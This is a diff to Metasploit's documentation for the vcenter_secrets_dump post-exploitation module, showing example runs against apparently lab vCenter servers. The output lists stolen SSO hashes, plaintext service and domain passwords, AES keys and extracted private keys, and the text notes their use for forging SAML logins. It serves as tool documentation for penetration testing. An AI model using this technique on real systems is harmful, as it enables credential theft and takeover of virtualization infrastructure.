-[+] vSphere SSO User Credential: CN=workload_storage_management-07afcee6-c2e2-4d0a-aa28-0305ab5825a4,cn=ServicePrincipals,dc=delta,dc=vsphere,dc=local:$dynamic_82$dc5845fe5c4efe7dcfc330d1dfc41c9e537976c8e03198e47a8642ac766745939ed794393f95567e579ddf473050754d2c0b1f751c077a5c963ceda7d6d00122$HEX$edb031a9330b1d1ff17527976a601107
-[+] vSphere SSO User Credential: cn=vcenterdelta.cesium137.io,ou=Domain Controllers,dc=delta,dc=vsphere,dc=local:$dynamic_82$d857c278b1dfa799e293f0f35551d29b01973c24ef9e2c0e079d09049826ca824757f8377e7646e003272a39ae459a66c5fca54ac76eb67ddc5d1133cb4c4628$HEX$4ae8badb536deab2c3be64d3a1dfeb2e
-[+] vSphere SSO User Credential: CN=waiter-0ad33e8d-0ca0-4912-8eb0-0a80a16fda82,cn=users,dc=delta,dc=vsphere,dc=local:$dynamic_82$9a9dd8ec92a332b91b7602d45404a144973c75f54111ecf7cdfa70cea29e358838132f8380361091a40efdf52c5ac34cfd988574e489a83e2c1f1438c764bad0$HEX$2971d8fd5160de2e71a0dfa744af5d6b
-[+] vSphere SSO User Credential: cn=krbtgt/DELTA.VSPHERE.LOCAL,cn=users,dc=DELTA,dc=VSPHERE,dc=LOCAL:$dynamic_82$41437d26f1d4c2cdc67cff7ec66f91da643cb4b331fc00fa052ace43e4eae7ef277f9b9b05d5c06c46f5b73bc2132ed772552274464098d2479604161a001d32$HEX$5a21a4b810348c78f9997a3c405f3340
-[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=DELTA,dc=VSPHERE,dc=LOCAL:$dynamic_82$aa0ef201580566738898162a079c70daa0bb19be0927d6b44ac3d65724df1e14cd6c273c132cd117b98ed8c7b37d2ae861d96e6ff28e97e81f54629072a83e62$HEX$031df0af1964ea1e5c733541f2f89a7d
-[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=delta,dc=vsphere,dc=local:$dynamic_82$cd4362341bb01e2de096c262c59e3c6f8bedf78ae96f378de57e369d5071f114fba4c43c4d577317ea3d923eafa9b9a6f6154a10d0e81f7fa00fb711b3519a8c$HEX$0155fb261f868fbf8f3feda9139acc50
-[+] vSphere SSO User Credential: cn=vmca/vcenterdelta.cesium137.io@DELTA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=delta,dc=vsphere,dc=local:$dynamic_82$b478eb780a9f43960541a236b4f258bf9d7726f76d6f9d13f25fc815bac002b191be96a90c87bf607b54e13769878b5863cde7eb12b151db5c5892e9b00e5f48$HEX$a56c39678fd290619f726e31c5d6fce8
-[+] vSphere SSO User Credential: cn=ldap/vcenterdelta.cesium137.io@DELTA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=delta,dc=vsphere,dc=local:$dynamic_82$efeb6777719ccb7278a6c216e3a307bc0a4a9ecbf240a36a6947161dbd44e143cb8fa9712f2629e7022bb2bcdf3c144b7ecbbc499f15dd3791e920205ec7fcba$HEX$bb3eddcba08bf93c372f23a45c5fb651
-[+] vSphere SSO User Credential: cn=DNS/vcenterdelta.cesium137.io@DELTA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=delta,dc=vsphere,dc=local:$dynamic_82$059761db3117ce52c864cf5dab7b6320f47d0e09c1ff3afaa0835fe4775aa0669a09ee26412e15bfc8337a9747e73e4ffab1859292e716dba0e92104708332a6$HEX$4629f7e9c587f6d1b57b2f56e96bf05a
-[+] vSphere SSO User Credential: cn=host/vcenterdelta.cesium137.io@DELTA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=delta,dc=vsphere,dc=local:$dynamic_82$6b11a2b58752e8409f57bc72b45e6599209714000b8a17e95d661663d54d691ce013be2700fa6c8e30e6d98259d1810c5f883fcc8099bd16342e6a4c0d179895$HEX$2a14a8f480ca071f6edffd3720732d5d
+[+] vSphere SSO User Credential: CN=workload_storage_management-ec24f710-eb5f-4c56-8d75-04e3acd8a8c2,cn=ServicePrincipals,dc=vsphere,dc=local:$dynamic_82$33ddf30f6b0424709bc10cc0c9c5a8e5959379323fb9d334ee9fcfe39d97e6bd20e9fd39772eef62a00ee8d1aee5391a91dc4f14b4ddd23a343ffb99286912b6$HEX$7aa1f5b608ac139e0228b3641780f066
+[+] vSphere SSO User Credential: CN=workload_storage_management-0445bb8f-6d93-4542-b5f2-8e001f244c4d,cn=ServicePrincipals,dc=vsphere,dc=local:$dynamic_82$f36a754e1fe140469d474ed2bc38b9d2731dbf0fa5696d97b1a5ef43184afdf2c3fb34adfd53b5a64b9758aad1d8ceb95f3737c4b56f927130a5677f4e069024$HEX$255677e68a4cb70f248c0c1c5cc0d535
+[+] vSphere SSO User Credential: cn=vcenter01.cesium137.io,ou=Domain Controllers,dc=vsphere,dc=local:$dynamic_82$261e4cf02319b07804641c2fc4857347067ad90d309f616388189bdb884a465a482b136be1123702c93edea030e690a78df52c7cc64c3e70e2b3a3711a198875$HEX$00c9af9c9f3dc42f45394a45680186f0
+[+] vSphere SSO User Credential: cn=vpsc02.cesium137.io,ou=Domain Controllers,dc=vsphere,dc=local:$dynamic_82$c8dc9df7ba182c7d6936c410ab9c853f8c147bc7a46d0514103400aba645c5be793486f046a16c9eef9e59f1c96bff957800dfd0c0ae655ab96e07b232065f25$HEX$82d41cdccd86ced37414bff1c8d8677c
+[+] vSphere SSO User Credential: cn=vcenter02.cesium137.io,ou=Domain Controllers,dc=vsphere,dc=local:$dynamic_82$0ed0880ca0e729c500efb167b483b97438243240877d819068f3b72c48c1cb16b2a18b9eb7a9c837abcf1d3cbc178e7ac19ae67545d4a209160fafea077da3d5$HEX$c331dc88e73aabc8d96f50857c461b6c
+[+] vSphere SSO User Credential: CN=waiter-3caf7fef-84fa-4f93-93e5-adeeea22d421,cn=users,dc=vsphere,dc=local:$dynamic_82$5c28979073432937d71819dc359e7b0be0427abf124e80c0cbb826ee127f97c7a4f1c292aa82890d8d0872d610671c84c435ed5c4ed7f5fce0d3d1990943f6b2$HEX$599215fb7018265c2fa36a47b4ac6367
+[+] vSphere SSO User Credential: CN=waiter a8e38b28-999a-4ed8-ac8d-9ddf0609a713,cn=users,dc=vsphere,dc=local:$dynamic_82$1881e13ab2cb1fb07a14ad09abfead757e64c7c0f016517267a3b7f08fe6b8f769ec6a1e2186c50359a88ebe05eeef71be0e79d46c352614c4bea0228310d289$HEX$8bf5f1fc78282695c8302a65270488e5
+[+] vSphere SSO User Credential: CN=waiter 3699041e-1df3-4c9b-b19b-83089a0c1fd3,cn=users,dc=vsphere,dc=local:$dynamic_82$7cedf7b7509db4b7cd765a9420feb229c890d5ca2fede1cef9acde88c8dd47eb3100ac638c0cdfc835db87c7996dbdd306229e3c82d4d59c5f1074a60be601c3$HEX$02b97b55a88e9a0da17009f5f2cbbba3
+[+] vSphere SSO User Credential: CN=waiter 39b36112-8919-44a3-9bb4-16220d893685,cn=users,dc=vsphere,dc=local:$dynamic_82$f3c082819e1efb8af638d3babf414d50a04711df95912e33eeeba416eed4b5dac64c6e099b8669697ef07a3e7eb2143b422838c26c30d053843c8d203c0a47ae$HEX$09a6f94e00ef8c31dcd02b51f1f32424
+[+] vSphere SSO User Credential: CN=waiter 7d8434a8-add2-430a-9457-f5f15d9a74b8,cn=users,dc=vsphere,dc=local:$dynamic_82$f2a6ebbb6dcb5abc870e2f1ad84db9e6e631b7a262e247e4188b7afe1cd42c49db3a08b6334a115af95e9a327294f81d9f0672e7b4a637203d4a1c92da81bad6$HEX$00a3aff20941067ce84156dd13b61107
+[+] vSphere SSO User Credential: CN=waiter-7bbefce3-9e0d-49c0-a204-9d275af3d259,cn=users,dc=vsphere,dc=local:$dynamic_82$e6f4e99f3b7990af327246bb8cd4c66933fcd86b97441da875029482f7a290fc4e5eea0e753cb8ee89cb4531730e5ff631349fc65456af6fc9e79505b22ec57d$HEX$13075497741d56d0d71f0b1eedb878ea
+[+] vSphere SSO User Credential: cn=krbtgt/VSPHERE.LOCAL,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$360cbc987ac2a96862ca30951ee34810e850b2976aab6a799f6a0158e43c72bda4525159c5aee958b4d567d125823f7040d0efe2ca36140a41b0e42230ce55ae$HEX$438a4343f8df8811b18af35246f5309f
+[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$c92391404befe611ad2f9c20d6f521fb183a6d30762b44961cf9ace1714032721570c942cff57c38a8d3dbaafa2841819318b0308f2dba8e4ae0603a7c784ab7$HEX$e048ed8e208704464f688bce99e330b0
+[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=vsphere,dc=local:$dynamic_82$b5ca7b488446b18c3fb94a348d16fc336c86af43b7b2ae8410984f09b3f7245ac00bf40a62c1efde98d94e333945c5a1ab385d365bac378016f337f39ac3489e$HEX$a021eafda1cec51c7cdf519b80ae549c
+[+] vSphere SSO User Credential: CN=metasploit,CN=Users,dc=vsphere,dc=local:$dynamic_82$1caf99644bf6ccc50dac6013e8904ce8b0b0eff16b794598f04d2f7397bab2927d35cef9e320b16342384287a08b10b38a6583bd7d535117751bdc0980798264$HEX$ac970912b2ba39c356bb744317119df3
+[+] vSphere SSO User Credential: cn=vmca/vcenter01.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$ef489edafd1d83898fae1f722db842a968fbbe217df75cae9fe92f8dafb3a35d4ab8893f9593611b1227bfcd9819f09504d3eccfb19156b221a6d2ca9ec8fd2e$HEX$77a9dc5f4dfda08d807e0bc619ccfca4
+[+] vSphere SSO User Credential: cn=ldap/vcenter01.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$f5495355fae1701486912bde4ad9f70c74e080f74f314da54b518b8f8607f2f927cfb95363398612c1896938e5f8c3434564429e7f5824ec7728222f0ece682f$HEX$3c2b68f41dbba61f5a523f75f31b60ee
+[+] vSphere SSO User Credential: cn=DNS/vcenter01.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$e74daf82ff2d2bf4df8d61bdce19e45b2be0cda688e5f1d6bd08c9f24c9d192af3c68da9a634dec22e2a51bc28c75df3c23745346ffd47db5975fad177d1a555$HEX$bc9a096a52fe56b7a815bebc7bb8f4fe
+[+] vSphere SSO User Credential: cn=host/vcenter01.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$6dda0cb0b521e266a145c707e3f2557cbfb0ec741dfb26abc777e3f85ff2320d3fcb4f8fd8f1d2e1f32c756f08f0b5cc693b561617124abd4d8ac93f8bbef9a4$HEX$92035bd0b5a71a480a406dfd79f82f9b
+[+] vSphere SSO User Credential: cn=vmca/vpsc02.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$594c04de02a30041b6448c344664bc53c7e232a1ee6d5e29ac358d47834bf77054403235699ebe9f91439dcf8fda4e4728d5532a4dddb8f548a259eeb3590061$HEX$addf629942720b8f102cfb96b192bc8b
+[+] vSphere SSO User Credential: cn=ldap/vpsc02.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$9abbb4a19a4c6f107f36dd8b708f5f151f4f744d7437335c976e4e8adb5c7e286741a75ad14bb585f44780c8ff0792efe3abb1cf5f4330cf4a0cf6556466d0bf$HEX$58d6addcb4ee52df4988302b6a2f2310
+[+] vSphere SSO User Credential: cn=host/vpsc02.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$5a9724d4acf93f9c1c20afb2f9f64a828df3dacc36f846450c9f07bab725184627393a36aa13e2bc6f8ddbd06e1e6e5a17e4f8892aee7df56aa298268a2ba8ca$HEX$03f238946b6341e6602d74d003fe4042
+[+] vSphere SSO User Credential: cn=vmca/vcenter02.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$29f0ad0bb606fc4e1dc3af70fc5e9ccb08f1255bb926a5700a3682c83e2a1a732968ed0a2da74455e2c2a2384b670b30dd817a1f0e48f5cdc242db4e6b8aee39$HEX$e1e24ff54acaa46d56875ae4c66683e7
+[+] vSphere SSO User Credential: cn=ldap/vcenter02.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$7e9c85e1a314dbaedbf52407dee2aacb10b3a52650e6e3dd74dae1e155c856588e6079534942e0510dfd51c847f3b55b9341b19c85f9a151227e58c21a365f1e$HEX$ce394a2c15db9c5005f6358ce8d1a020
+[+] vSphere SSO User Credential: cn=DNS/vcenter02.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$624f0f9887910b0498b5da5e142b4ee1ba98c5384f188b9bc134a73f27688416e96ea001072cfa3ffb2a30a2a432d635661b46d7335b48ad963327c1041bd2b1$HEX$a23bdbb173b3af717692617df06de4d5
+[+] vSphere SSO User Credential: cn=host/vcenter02.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$de963b26e0e66f6115d5dedf3453da6690bbc06888400fa9126dc306f32866d44315c4e6e87fa9fd3f6f62be458a2170392e0ac8af16d3e59628253da8a8463b$HEX$a495926b9d71302a594d0c303ffb86cd
 [*] Processing SSO identity sources ...
 [*] Found SSO Identity Source Credential:
-[+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://vcenterdelta.cesium137.io:389:
-[+] SSOUSER: vcenterdelta.cesium137.io@delta.vsphere.local
-[+] SSOPASS: *6{ K3Ei*@<J[.gd5c3o
-[+] SSODOMAIN: delta.vsphere.local
+[+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://vcenter02.cesium137.io:389:
+[+] SSOUSER: vpsc01.cesium137.io@vsphere.local
+[+] SSOPASS: prfFHx`4I|e!$1hJZn]q
+[+] SSODOMAIN: vsphere.local
 [*] Found SSO Identity Source Credential:
-[+] IDENTITY_STORE_TYPE_LDAP_WITH_AD_MAPPING @ ldap://cesium137.io:
-[+] SSOUSER: CESIUM137\ldap
-[+] SSOPASS: ThisIsSecret!
+[+] IDENTITY_STORE_TYPE_ACTIVE_DIRECTORY @ ldap://cesium137.io:
+[+] SSOUSER: vSphereSvc@cesium137.io
+[+] SSOPASS: %XkAl222bvCCx46VB
 [+] SSODOMAIN: cesium137.io
 [*] Extracting certificates from vSphere platform ...
-[+] VMCA_ROOT key: /home/cs137/.msf4/loot/20220502094949_default_192.168.100.70_vmca_533515.key
-[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220502094950_default_192.168.100.70_vmca_297516.pem
-[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220502094951_default_192.168.100.70_idp_205474.key
-[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220502094951_default_192.168.100.70_idp_311054.pem
-[+] MACHINE_SSL_CERT key: /home/cs137/.msf4/loot/20220502094954_default_192.168.100.70___MACHINE_CERT_414635.key
-[+] MACHINE_SSL_CERT cert: /home/cs137/.msf4/loot/20220502094955_default_192.168.100.70___MACHINE_CERT_332870.pem
-[+] MACHINE key: /home/cs137/.msf4/loot/20220502094957_default_192.168.100.70_machine_023374.key
-[+] MACHINE cert: /home/cs137/.msf4/loot/20220502094958_default_192.168.100.70_machine_922815.pem
-[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220502095000_default_192.168.100.70_vspherewebclien_713962.key
-[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220502095000_default_192.168.100.70_vspherewebclien_136515.pem
-[+] VPXD key: /home/cs137/.msf4/loot/20220502095002_default_192.168.100.70_vpxd_481212.key
-[+] VPXD cert: /home/cs137/.msf4/loot/20220502095003_default_192.168.100.70_vpxd_493549.pem
-[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220502095005_default_192.168.100.70_vpxdextension_165639.key
-[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220502095005_default_192.168.100.70_vpxdextension_834804.pem
-[+] HVC key: /home/cs137/.msf4/loot/20220502095007_default_192.168.100.70_hvc_915656.key
-[+] HVC cert: /home/cs137/.msf4/loot/20220502095008_default_192.168.100.70_hvc_016439.pem
-[+] DATA-ENCIPHERMENT key: /home/cs137/.msf4/loot/20220502095010_default_192.168.100.70_dataenciphermen_687504.key
-[+] DATA-ENCIPHERMENT cert: /home/cs137/.msf4/loot/20220502095010_default_192.168.100.70_dataenciphermen_813371.pem
-[+] SMS key: /home/cs137/.msf4/loot/20220502095012_default_192.168.100.70_sms_self_signed_661559.key
-[+] SMS cert: /home/cs137/.msf4/loot/20220502095013_default_192.168.100.70_sms_self_signed_175435.pem
-[+] WCP key: /home/cs137/.msf4/loot/20220502095015_default_192.168.100.70_wcp_787364.key
-[+] WCP cert: /home/cs137/.msf4/loot/20220502095016_default_192.168.100.70_wcp_947384.pem
+[+] VMCA_ROOT key: /home/cs137/.msf4/loot/20220503143431_dev_192.168.100.11_vmca_584377.key
+[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220503143432_dev_192.168.100.11_vmca_373989.pem
+[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220503143434_dev_192.168.100.11_idp_495008.key
+[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220503143434_dev_192.168.100.11_idp_590306.pem
+[+] MACHINE_SSL_CERT key: /home/cs137/.msf4/loot/20220503143436_dev_192.168.100.11___MACHINE_CERT_035985.key
+[+] MACHINE_SSL_CERT cert: /home/cs137/.msf4/loot/20220503143437_dev_192.168.100.11___MACHINE_CERT_047549.pem
+[+] MACHINE key: /home/cs137/.msf4/loot/20220503143440_dev_192.168.100.11_machine_352224.key
+[+] MACHINE cert: /home/cs137/.msf4/loot/20220503143440_dev_192.168.100.11_machine_590500.pem
+[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220503143442_dev_192.168.100.11_vspherewebclien_717603.key
+[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220503143443_dev_192.168.100.11_vspherewebclien_499228.pem
+[+] VPXD key: /home/cs137/.msf4/loot/20220503143445_dev_192.168.100.11_vpxd_493932.key
+[+] VPXD cert: /home/cs137/.msf4/loot/20220503143445_dev_192.168.100.11_vpxd_945960.pem
+[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220503143447_dev_192.168.100.11_vpxdextension_661250.key
+[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220503143448_dev_192.168.100.11_vpxdextension_184377.pem
+[+] SMS key: /home/cs137/.msf4/loot/20220503143450_dev_192.168.100.11_sms_self_signed_108815.key
+[+] SMS cert: /home/cs137/.msf4/loot/20220503143450_dev_192.168.100.11_sms_self_signed_717860.pem
+[+] DATA-ENCIPHERMENT key: /home/cs137/.msf4/loot/20220503143453_dev_192.168.100.11_dataenciphermen_619118.key
+[+] DATA-ENCIPHERMENT cert: /home/cs137/.msf4/loot/20220503143454_dev_192.168.100.11_dataenciphermen_976218.pem
+[+] HVC key: /home/cs137/.msf4/loot/20220503143456_dev_192.168.100.11_hvc_722861.key
+[+] HVC cert: /home/cs137/.msf4/loot/20220503143456_dev_192.168.100.11_hvc_786924.pem
+[+] WCP key: /home/cs137/.msf4/loot/20220503143458_dev_192.168.100.11_wcp_253108.key
+[+] WCP cert: /home/cs137/.msf4/loot/20220503143459_dev_192.168.100.11_wcp_046781.pem
 [*] Searching for secrets in VM Guest Customization Specification XML ...
-[*] Processing vpx_customization_spec 'Good Win10 Template with Local and Domain Join' ...
-[*] Validating data encipherment key ...
-[*] Initial administrator account password found for vpx_customization_spec 'Good Win10 Template with Local and Domain Join':
-[+] Built-in administrator PW: SamIAm!
-[*] AD domain join account found for vpx_customization_spec 'Good Win10 Template with Local and Domain Join':
-[+] AD User: administrator@cesium137.io
-[+] AD Pass: IAmSam!
-[*] Processing vpx_customization_spec 'Borked Win10 Template' ...
+[*] Processing vpx_customization_spec 'Windows 10 Enterprise' ...
 [*] Validating data encipherment key ...
 [!] Could not associate encryption public key with any of the private keys extracted from vCenter, skipping
-[*] Processing vpx_customization_spec 'Good Win10 Template with Local' ...
+[*] Processing vpx_customization_spec 'Windows Server 2016 Datacenter' ...
 [*] Validating data encipherment key ...
-[*] Initial administrator account password found for vpx_customization_spec 'Good Win10 Template with Local':
-[+] Built-in administrator PW: SamIAm!
+[*] Initial administrator account password found for vpx_customization_spec 'Windows Server 2016 Datacenter':
+[+] Built-in administrator PW: IAmSam!
+[*] AD domain join account found for vpx_customization_spec 'Windows Server 2016 Datacenter':
+[+] AD User: vSphereSvc@cesium137.io
+[+] AD Pass: SamIAm!
 [*] Post module execution completed
 ```
 
 Example run from vCenter 6.0 Update 3j
 
 ```
+msf6 exploit(multi/handler) > use post/linux/gather/vcenter_secrets_dump
+msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
+session => 1
 msf6 post(linux/gather/vcenter_secrets_dump) > dump
 
+[*] VMware VirtualCenter 6.0.0 build-14510547
 [*] Gathering vSphere SSO domain information ...
 [*] vSphere Hostname and IPv4: vcenteralpha [192.168.100.60]
 [+] vSphere SSO DC DN: cn=vcenteralpha.cesium137.io,ou=Domain Controllers,dc=alpha,dc=vsphere,dc=local
 [+] vSphere SSO DC PW: <PMW{T:4mnb@UBs/$f(w
 [*] Extract vmdird tenant AES encryption keys ...
-[+] vSphere Tenant AES encryption key: (>d%>D3'i@rAj}!" hex: 0x283e64253e443327694072416a7d2122
+[+] vSphere Tenant AES encryption key: (>d%>D3'i@rAj}!" hex: 283e64253e443327694072416a7d2122
+[*] Extract vmware-vpx AES key ...
+[+] vmware-vpx AES encryption key hex: acdeb90515681eb8c357e3a94312106934f174324c39d1deb012337effc124de
 [*] Extracting PostgreSQL database credentials ...
 [+] VCDB Name: VCDB User: vc PW: 4yFcqZ2$m^&H<K?z
-[*] Extracting vSphere SSO domain information ...
+[*] Extract ESXi host vpxuser credentials ...
+[*] Extracting vSphere SSO domain secrets ...
 [*] Dumping vmdir schema to LDIF ...
-[+] LDIF Dump: /home/cs137/.msf4/loot/20220502085244_default_192.168.100.60_vmdir_046059.ldif
+[+] LDIF Dump: /home/cs137/.msf4/loot/20220503144159_dev_192.168.100.60_vmdir_157656.ldif
 [*] Processing vmdir LDIF (this may take several minutes) ...
 [*] Processing LDIF entries ...
 [*] Processing SSO account hashes ...
@@ -162,25 +187,25 @@ msf6 post(linux/gather/vcenter_secrets_dump) > dump
 [+] SSOPASS: <PMW{T:4mnb@UBs/$f(w
 [+] SSODOMAIN: alpha.vsphere.local
 [*] Extracting certificates from vSphere platform ...
-[+] VMCA_ROOT key: /home/cs137/.msf4/loot/20220502085246_default_192.168.100.60_vmca_730841.key
-[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220502085246_default_192.168.100.60_vmca_303377.pem
+[+] VMCA_ROOT key: /home/cs137/.msf4/loot/20220503144201_dev_192.168.100.60_vmca_075148.key
+[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220503144201_dev_192.168.100.60_vmca_217694.pem
 [!] vmwSTSPrivateKey was not found in vmdir, checking for legacy ssoserverSign key PEM files ...
 [-] Unable to query IDM tenant information, cannot validate ssoserverSign certificate against IDM
 [!] Could not reconcile vmdir STS IdP cert chain with cert chain advertised by IDM - this credential may not work
-[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220502085248_default_192.168.100.60_idp_374103.key
-[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220502085249_default_192.168.100.60_idp_897642.pem
-[+] MACHINE_SSL_CERT key: /home/cs137/.msf4/loot/20220502085251_default_192.168.100.60___MACHINE_CERT_266327.key
-[+] MACHINE_SSL_CERT cert: /home/cs137/.msf4/loot/20220502085252_default_192.168.100.60___MACHINE_CERT_869538.pem
-[+] MACHINE key: /home/cs137/.msf4/loot/20220502085255_default_192.168.100.60_machine_898622.key
-[+] MACHINE cert: /home/cs137/.msf4/loot/20220502085255_default_192.168.100.60_machine_140140.pem
-[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220502085257_default_192.168.100.60_vspherewebclien_752462.key
-[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220502085258_default_192.168.100.60_vspherewebclien_504719.pem
-[+] VPXD key: /home/cs137/.msf4/loot/20220502085259_default_192.168.100.60_vpxd_602894.key
-[+] VPXD cert: /home/cs137/.msf4/loot/20220502085300_default_192.168.100.60_vpxd_332516.pem
-[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220502085302_default_192.168.100.60_vpxdextension_363126.key
-[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220502085303_default_192.168.100.60_vpxdextension_268974.pem
-[+] SMS key: /home/cs137/.msf4/loot/20220502085304_default_192.168.100.60_sms_self_signed_164497.key
-[+] SMS cert: /home/cs137/.msf4/loot/20220502085305_default_192.168.100.60_sms_self_signed_765910.pem
+[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220503144203_dev_192.168.100.60_idp_658848.key
+[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220503144203_dev_192.168.100.60_idp_801629.pem
+[+] MACHINE_SSL_CERT key: /home/cs137/.msf4/loot/20220503144206_dev_192.168.100.60___MACHINE_CERT_215002.key
+[+] MACHINE_SSL_CERT cert: /home/cs137/.msf4/loot/20220503144206_dev_192.168.100.60___MACHINE_CERT_468549.pem
+[+] MACHINE key: /home/cs137/.msf4/loot/20220503144209_dev_192.168.100.60_machine_609849.key
+[+] MACHINE cert: /home/cs137/.msf4/loot/20220503144210_dev_192.168.100.60_machine_688132.pem
+[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220503144212_dev_192.168.100.60_vspherewebclien_019807.key
+[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220503144212_dev_192.168.100.60_vspherewebclien_683531.pem
+[+] VPXD key: /home/cs137/.msf4/loot/20220503144214_dev_192.168.100.60_vpxd_431794.key
+[+] VPXD cert: /home/cs137/.msf4/loot/20220503144215_dev_192.168.100.60_vpxd_798188.pem
+[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220503144217_dev_192.168.100.60_vpxdextension_621629.key
+[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220503144217_dev_192.168.100.60_vpxdextension_661698.pem
+[+] SMS key: /home/cs137/.msf4/loot/20220503144219_dev_192.168.100.60_sms_self_signed_130806.key
+[+] SMS cert: /home/cs137/.msf4/loot/20220503144220_dev_192.168.100.60_sms_self_signed_905150.pem
 [*] Searching for secrets in VM Guest Customization Specification XML ...
 [!] No vpx_customization_spec entries evident
 [*] Post module execution completed

--- a/documentation/modules/post/linux/gather/vcenter_secrets_dump.md
+++ b/documentation/modules/post/linux/gather/vcenter_secrets_dump.md
@@ -1,7 +1,7 @@
 Grab secrets and keys from the vCenter server and add them to loot. Secrets include the dcAccountDN
-and dcAccountPassword for the vCenter machine which can be used for maniuplating the SSO domain via
+and dcAccountPassword for the vCenter machine which can be used for manipulating the SSO domain via
 standard LDAP interface; good for plugging into the vmware_vcenter_vmdir_ldap module or for adding
-new SSO admin users. The MACHINE_SSL, VMCA_ROOT and SSO IdP certificates with assocaited private keys
+new SSO admin users. The MACHINE_SSL, VMCA_ROOT and SSO IdP certificates with associated private keys
 are also plundered and can be used to sign forged SAML assertions for the /ui admin interface.
 
 ## Vulnerable Application
@@ -52,9 +52,10 @@ msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
 session => 1
 msf6 post(linux/gather/vcenter_secrets_dump) > dump
 
-[*] VMware VirtualCenter 7.0.3 build-19480866
-[*] Gathering vSphere SSO domain information ...
 [*] vSphere Hostname and IPv4: vcenterdelta.cesium137.io [192.168.100.70]
+[*] VMware VirtualCenter 7.0.3 build-19480866
+[*] Embedded Platform Service Controller
+[*] Gathering vSphere SSO domain information ...
 [+] vSphere SSO DC DN: cn=vcenterdelta.cesium137.io,ou=Domain Controllers,dc=delta,dc=vsphere,dc=local
 [+] vSphere SSO DC PW: *6{ K3Ei*@<J[.gd5c3o
 [*] Extract vmdird tenant AES encryption key ...
@@ -148,9 +149,10 @@ msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
 session => 1
 msf6 post(linux/gather/vcenter_secrets_dump) > dump
 
+[*] vSphere Hostname and IPv4: vcenteralpha.cesium137.io [192.168.100.60]
 [*] VMware VirtualCenter 6.0.0 build-14510547
+[*] Embedded Platform Service Controller
 [*] Gathering vSphere SSO domain information ...
-[*] vSphere Hostname and IPv4: vcenteralpha [192.168.100.60]
 [+] vSphere SSO DC DN: cn=vcenteralpha.cesium137.io,ou=Domain Controllers,dc=alpha,dc=vsphere,dc=local
 [+] vSphere SSO DC PW: <PMW{T:4mnb@UBs/$f(w
 [*] Extract vmdird tenant AES encryption key ...
@@ -211,3 +213,61 @@ msf6 post(linux/gather/vcenter_secrets_dump) > dump
 [*] Post module execution completed
 msf6 post(linux/gather/vcenter_secrets_dump) >
 ```
+
+Example run from meterpreter session on vCenter appliance version 6.5 U3q, configured with an external PSC
+
+```
+msf6 exploit(multi/handler) > use post/linux/gather/vcenter_secrets_dump
+msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
+session => 1
+msf6 post(linux/gather/vcenter_secrets_dump) > dump
+
+[*] vSphere Hostname and IPv4: vctr01.cesium137.io [192.168.0.111]
+[*] VMware VirtualCenter 6.5.0 build-18499837
+[!] External Platform Service Controller: psc01.cesium137.io
+[!] This module assumes embedded PSC, functionality will be limited
+[*] Gathering vSphere SSO domain information ...
